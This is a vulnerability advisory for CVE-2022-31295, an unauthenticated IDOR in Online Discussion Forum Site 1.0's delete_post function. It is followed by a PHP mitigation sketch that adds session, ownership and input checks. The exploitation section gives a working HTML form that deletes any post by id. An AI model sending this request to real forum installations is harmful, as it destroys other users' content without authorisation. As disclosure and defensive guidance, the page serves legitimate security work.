
CVE-2022-31295: GitHub - bigzooooz/CVE-2022-31295: Online Discussion Forum Site 1.0 - IDOR / Delete any post

An issue in the delete_post() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily delete posts.


CVE-2022-31295

Online Discussion Forum Site 1.0 - IDOR / Delete any post

Exploit Title: Online Discussion Forum Site 1.0 - IDOR / Delete any post
Date: 2022-06-13
CVE: CVE-2022-31295
Exploit Author: Abdulaziz Saad (@b4zb0z)
Vendor Homepage: https://www.sourcecodester.com/
Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html
Version: 1.0
Tested on: LAMP, Ubuntu

[#] Vulnerability Location: function delete_post() in /odfs/classes/Master.php:133

[#] Exploitation:

    <form action="http://localhost/odfs/classes/Master.php?f=delete_post" method="post" id="manage-user">
      <input type="text" name="id" value="" placeholder="enter POST ID to delete" required>
      <button type="submit">Delete Post</button>
    </form>
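[#] Mitigation sketch (added example, not code from the project or from the advisory author): a delete handler that requires a logged-in session and binds the DELETE to the caller's ownership of the post, so a bare POST with an arbitrary id no longer removes anything. The table `posts` (columns `id`, `user_id`), the session keys `user_id` and `is_admin`, and the function signature are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example. Hypothetical names throughout: table `posts` (id, user_id),
// session keys `user_id` / `is_admin`, and this function signature.
// Intended call site: delete_post($conn, $_SESSION, $_POST);
function delete_post(mysqli $db, array $session, array $post): array
{
    // 1. Authentication: a request without a logged-in session is refused
    //    before any database access happens.
    if (empty($session['user_id'])) {
        return ['status' => 'failed', 'code' => 401, 'msg' => 'login required'];
    }

    // 2. Input validation: the post id must be a positive integer.
    //    Missing values, arrays and non-numeric strings all yield false.
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return ['status' => 'failed', 'code' => 400, 'msg' => 'invalid post id'];
    }

    // 3. Authorization inside the statement itself: the row is deleted only
    //    if it belongs to the caller, or the caller is an administrator.
    //    Doing the ownership test in the WHERE clause avoids a separate
    //    check-then-delete step that could be skipped or raced.
    $uid   = (int) $session['user_id'];
    $admin = !empty($session['is_admin']) ? 1 : 0;
    $stmt  = $db->prepare(
        'DELETE FROM posts WHERE id = ? AND (user_id = ? OR ? = 1)'
    );
    $stmt->bind_param('iii', $id, $uid, $admin);
    $stmt->execute();

    // 4. Same answer for "no such post" and "not your post", so the
    //    endpoint does not reveal which ids exist.
    if ($stmt->affected_rows !== 1) {
        return ['status' => 'failed', 'code' => 404, 'msg' => 'post not found'];
    }
    return ['status' => 'success', 'code' => 200];
}
```

A failed delete from this handler (401 or 404 for an id the session does not own) is also a useful event to log when watching for id enumeration against the endpoint.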
